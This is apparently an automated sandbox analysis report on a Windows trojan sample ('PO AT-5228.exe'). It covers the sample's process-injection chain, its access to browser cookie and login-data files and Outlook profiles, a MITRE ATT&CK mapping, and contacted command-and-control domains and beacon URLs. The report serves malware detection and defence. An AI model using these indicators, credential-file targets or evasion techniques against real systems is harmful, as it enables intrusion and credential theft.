Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtUnmapViewOfSection: Direct from: 0x76F02D3C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe protection: read write
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\AtBroker.exe | Thread register set: target process: 7744
Source: C:\Windows\SysWOW64\AtBroker.exe | Thread APC queued: target process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Source: C:\Users\user\Desktop\PO AT-5228.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30C008
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9B106 LogonUserW, | 0_2_00B9B106
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00B63D19
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA411C SendInput,keybd_event, | 0_2_00BA411C
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA74BB mouse_event, | 0_2_00BA74BB
Source: C:\Users\user\Desktop\PO AT-5228.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO AT-5228.exe"
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00B9A66C
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 0_2_00BA71FA
Source: PO AT-5228.exe, BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: PO AT-5228.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B865C4 cpuid 0_2_00B865C4
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00BB091D
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BDB340 GetUserNameW,0_2_00BDB340
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B91E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B91E8E
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B7DDC0

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\AtBroker.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: PO AT-5228.exe | Binary or memory string: WIN_81
                Source: PO AT-5228.exe | Binary or memory string: WIN_XP
                Source: PO AT-5228.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: PO AT-5228.exe | Binary or memory string: WIN_XPe
                Source: PO AT-5228.exe | Binary or memory string: WIN_VISTA
                Source: PO AT-5228.exe | Binary or memory string: WIN_7
                Source: PO AT-5228.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BB8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BB8C4F
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BB923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BB923B

                MITRE ATT&CK Matrix (the number before a technique is the count of matching signatures)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph (ID: 1554972, Sample: PO AT-5228.exe, Start date: 13/11/2024, Architecture: WINDOWS, Score: 100)

                Start: contacts www.kghjkx.xyz, www.iuyi542.xyz and 19 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures
                  www.iuyi542.xyz: Performs DNS queries to domains with low reputation
                  PO AT-5228.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                    svchost.exe (started): Maps a DLL or memory area into another process
                      BLUymyzgBTyhbo.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                        AtBroker.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          BLUymyzgBTyhbo.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); contacts www.flikka.site 67.223.117.142 (ports 59058, 59069, 59085; VIMRO-AS15189US, United States), www.kghjkx.xyz 47.129.103.185 (ports 59110, 59111, 59112; ESAMARA-ASRU, Canada) and 8 other IPs or domains
                          firefox.exe (started)

                Source | Detection | Scanner | Label
                PO AT-5228.exe | 34% | ReversingLabs | Win32.Trojan.AutoitInject
                PO AT-5228.exe | 27% | Virustotal |
                PO AT-5228.exe | 100% | Avira | HEUR/AGEN.1319223
                PO AT-5228.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                binacamasala.com | 0% | Virustotal |
                ladylawher.shop | 0% | Virustotal |
                www.kghjkx.xyz | 2% | Virustotal |
                Source | Detection | Scanner | Label
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111325300285.jpg | 0% | Avira URL Cloud | safe
                http://www.neg21.top/1i1f/ | 0% | Avira URL Cloud | safe
                http://www.energyparks.net/k47i/ | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111538232952.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111658373793.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js | 0% | Avira URL Cloud | safe
                http://www.primeproperty.property/c1ti/ | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js | 0% | Avira URL Cloud | safe
                http://www.ladylawher.shop/i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                http://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                http://www.yvrkp.top/9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                http://www.flikka.site/brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111832440129.jpg | 0% | Avira URL Cloud | safe
                http://www.ladylawher.shop/i4bc/ | 0% | Avira URL Cloud | safe
                https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPo | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js | 0% | Avira URL Cloud | safe
                http://www.iuyi542.xyz/cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= | 0% | Avira URL Cloud | safe
                http://www.kghjkx.xyz/usop/ | 0% | Avira URL Cloud | safe
                http://www.digitaladpro.shop | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111513122916.jpg | 0% | Avira URL Cloud | safe
                http://www.energyparks.net/k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121022389060.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png | 0% | Avira URL Cloud | safe
                http://www.binacamasala.com/usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111427368389.jpg | 0% | Avira URL Cloud | safe
                http://www.primeproperty.property/c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281124251637.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png | 0% | Avira URL Cloud | safe
                http://www.binacamasala.com/usv6/ | 0% | Avira URL Cloud | safe
                http://www.iuyi542.xyz/cymd/ | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111535192258.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg | 0% | Avira URL Cloud | safe
                http://www.digitaladpro.shop/m6se/ | 0% | Avira URL Cloud | safe
                http://www.college-help.info/fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111752281448.jpg | 0% | Avira URL Cloud | safe
                http://www.yvrkp.top/9jdk/ | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png | 0% | Avira URL Cloud | safe
                https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand= | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121103162503.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281610030481.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111319395468.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281832298961.jpg | 0% | Avira URL Cloud | safe
                http://www.flikka.site/brrb/ | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121124551331.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg | 0% | Avira URL Cloud | safe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Reputation
                dns.webcake.io | 113.20.119.31 | true | false | high
                www.college-help.info | 38.88.82.56 | true | false | high
                ghs.google.com | 172.217.16.211 | true | false | high
                binacamasala.com | 3.33.130.190 | true | true | unknown
                ladylawher.shop | 3.33.130.190 | true | true | unknown
                www.kghjkx.xyz | 47.129.103.185 | true | true | unknown
                www.yvrkp.top | 104.21.14.183 | true | true | unknown
                www.flikka.site | 67.223.117.142 | true | true | unknown
                www.marketplacer.top | 194.58.112.174 | true | true | unknown
                iuyi542.xyz | 38.47.237.27 | true | true | unknown
                neg21.top | 206.119.81.36 | true | true | unknown
                energyparks.net | 3.33.130.190 | true | false | high
                15.164.165.52.in-addr.arpa | unknown | unknown | false | high
                www.primeproperty.property | unknown | unknown | false | unknown
                www.digitaladpro.shop | unknown | unknown | false | unknown
